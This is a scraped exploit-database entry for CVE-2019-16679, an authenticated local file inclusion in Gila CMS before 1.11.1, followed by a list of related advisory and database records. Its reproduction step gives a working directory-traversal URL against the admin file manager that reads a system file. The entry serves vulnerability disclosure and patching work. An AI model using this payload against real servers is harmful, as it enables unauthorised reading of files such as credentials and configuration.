Lucene search
Sainadh Jamalpur1337DAY-ID-33271HistorySep 23, 2019 - 12:00 a.m.
Gila CMS < 1.11.1 - Local File Inclusion Vulnerability
2019-09-2300:00:00
Sainadh Jamalpur
0day.today
18
EPSS
0.007
Percentile
80.3%
Exploit for php platform in category web applications
# Exploit Title: Authenticated Local File Inclusion(LFI) in GilaCMS
# Google Dork: N/A
# Exploit Author: Sainadh Jamalpur
# Vendor Homepage: https://github.com/GilaCMS/gila
# Software Link: https://github.com/GilaCMS/gila
# Version: 1.10.9
# Tested on: XAMPP version 3.2.2 in Windows 10 64bit,
# CVE : CVE-2019-16679
*********** *Steps to reproduce the Vulnerability* *************
Login into the application as an admin user or equivalent user and go the
below link
http://localhost/gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts
################################################################
# 0day.today [2019-12-04] #Related
exploitpack
exploitpack
Gila CMS 1.11.1 - Local File Inclusion
2019-09-23 00:00:00
prion
prion
Directory traversal
2019-09-21 20:15:00
packetstorm
packetstorm
Gila CMS Local File Inclusion
2019-09-23 00:00:00
cve
cve
CVE-2019-16679
2019-09-21 20:15:10
exploitdb
exploitdb
Gila CMS < 1.11.1 - Local File Inclusion
2019-09-23 00:00:00
nvd
nvd
CVE-2019-16679
2019-09-21 20:15:10
cvelist
cvelist
CVE-2019-16679
2019-09-21 20:00:35